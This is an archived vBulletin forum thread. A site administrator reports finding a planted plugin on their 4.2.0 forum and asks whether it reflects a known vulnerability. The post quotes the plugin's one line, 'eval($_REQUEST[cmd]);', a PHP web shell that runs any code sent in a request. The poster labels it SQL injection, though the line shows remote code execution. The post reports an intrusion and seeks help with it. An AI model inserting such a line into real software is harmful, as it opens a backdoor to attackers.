The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Dangerous SQL injection vulnerability in 4:2:0?
This week we found a new plugin (we are still investigating about "how") with this code:
Code:
eval($_REQUEST[cmd]); Do you know any known issues about this vulnerability in vBulletin 4.2.0 l2? Seems to be similar to this one: http://www.pcworld.com/article/24555...erability.html |
Thread Tools | |
Display Modes | |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|